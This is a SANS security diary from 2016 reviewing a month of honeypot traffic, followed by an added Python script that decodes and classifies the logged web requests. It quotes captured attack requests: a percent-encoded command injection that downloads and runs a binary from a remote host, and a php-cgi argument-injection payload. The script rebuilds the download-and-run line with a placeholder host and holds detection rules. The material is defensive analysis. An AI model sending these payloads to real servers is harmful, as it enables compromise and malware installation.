
Source SANS Institute
Identifier 170965
Publication date 2016-10-06 09:37:20 (seen: 2016-10-06 09:37:20)
Title Checking my honeypot day, (Thu, Oct 6th)
Text A number of the handlers, including myself, run a number of honeypots around the planet. Unfortunately I don't get to play with them as much as I want to. There are a bunch of automated processes in place, but on occasion I have a honeypot day/night where I check how they are doing and have a look to see what people are up to, as well as take a look at the executables being pulled. The main systems I have going at the moment are a SSH honeypot (kippo, soon to be cowrie), and a plain old web server. Looking at the last month or so, there are a few interesting things popping up as well as the usual suspects. The following are the top 10 locations attacking the web server.

[Figure: top 10 locations attacking the web server]

A fairly mixed bunch. The attacks are mostly the general stuff, fairly typical for most organisations that have some sort of web presence. The site is empty so the only things we see are fully automated checks. These are requests like:

(checking for file access) PROPFIND /webdav/ HTTP/1.1
(exploitation) GET /shell?%63%64%20%2F%74%6D%70%26%26%20%77%67%65%74%20%68%74%74%70%3A%2F%2F%32%32%32%2E%31%38%36%2E%32%31%2E%34%32%3A%33%33%38%39%30%2F%63%62%71%26%26%20%63%68%6D%6F%64%20%2B%78%20%63%62%71%26%26%20%2E%2F%63%62%71
    which is -- cd /tmp wget hxxp://222.186.xx.xx:33890/cbq chmod +x cbq ./cbq (the xx are mine)
(admin tool access) GET //phpMyAdmin .....

[Figure: various types of requests]

(scanner) GET /muieblackcat HTTP/1.1
(scanning) GET /w00tw00t.at.ISC.SANS.DFind: (no, that is not us)
(file inclusion) POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
    which is -- phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n
(open proxy check) CONNECT mx-tw.mail.gm0.yahoodns.net:25

The locations contain the usual suspects (NL, PL, CN). SG was a little bit of a surprise, likewise CA; I don't usually get traffic from those spots.

The SSH logs were interesting, although I had to make it the top 30. I suspect the pattern is relatively clear. Seems like Nanjing is a busy spot. I've mentioned in a previous post (about a year ago) that the whole 222.186.0.0/16 subnet can easily be blocked and your SSH brute forcing attempts will go down significantly. Looks like the subnet is still heavily at it. This pattern is repeated on other honeypots in different regions.

[Figure: top 30 SSH sources]

On this particular honeypot I allow access when the correct password is provided. The top 10 in this case are as follows:

[Figure: top 10 SSH sources with successful logins]

In this case a Russian IP address was the most active, although the actual location for the IP is in Prague (RU provider). They upload one stage which then fetches more nastiness. However, my honeypot doesn't take it that far. The CN locations seem more interested in just guessing passwords and not actually doing much more than that. Most of the actual connections are usually from the US, NL and DE (although NL must have been having a few bad months).

On the password and userid front the main user accounts and passwords used were:

[Table: Common users used / Common passwords used]
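The request types listed above, percent-decoded and sorted into the same categories the diary uses, as a small triage script; this is an added example, not the handler's own tooling. The sample request lines are constructed after the diary's examples, with the TEST-NET address 203.0.113.5 standing in for the real download host.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample request lines ("METHOD target HTTP/x.y"), modelled on the request
# types the diary lists; the download host 203.0.113.5 is a TEST-NET placeholder.
SAMPLE_REQUESTS = [
    "PROPFIND /webdav/ HTTP/1.1",
    "GET /shell?%63%64%20%2F%74%6D%70%26%26%20%77%67%65%74%20http%3A%2F%2F203.0.113.5"
    "%3A33890%2Fcbq%26%26%20chmod%20%2Bx%20cbq%26%26%20.%2Fcbq HTTP/1.1",
    "GET //phpMyAdmin/ HTTP/1.1",
    "GET /muieblackcat HTTP/1.1",
    "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1",
    "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+allow_url_include%3Don"
    "+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1",
    "CONNECT mx-tw.mail.gm0.yahoodns.net:25 HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

# (category, predicate over method, decoded path, decoded query), checked in order.
RULES = [
    ("open proxy check", lambda m, p, q: m == "CONNECT"),
    ("file access check (WebDAV)", lambda m, p, q: m == "PROPFIND" or p.startswith("/webdav")),
    ("command injection", lambda m, p, q: re.search(r"\b(wget|curl|chmod)\b", q) is not None),
    ("php-cgi argument injection / file inclusion",
     lambda m, p, q: "allow_url_include=on" in q or "auto_prepend_file=php://input" in q),
    ("admin tool probe", lambda m, p, q: "phpmyadmin" in p.lower()),
    ("scanner fingerprint", lambda m, p, q: "muieblackcat" in p or "w00tw00t" in p),
]

def decode_target(target):
    """Percent-decode path and query separately: '+' means space only in the query."""
    path, _, query = target.partition("?")
    return unquote(path), unquote_plus(query)

def classify(line):
    """Return (category, decoded target) for one request line."""
    parts = line.split(" ", 2)
    if len(parts) < 2:
        return ("malformed", line)
    method, target = parts[0], parts[1]
    path, query = decode_target(target)
    decoded = path + ("?" + query if query else "")
    for category, predicate in RULES:
        if predicate(method, path, query):
            return (category, decoded)
    return ("benign/unclassified", decoded)

def classify_all(lines):
    return [classify(line) for line in lines]
```

Rules are checked in order, so the CONNECT and PROPFIND checks fire before the query-string checks and a request only ever gets one category.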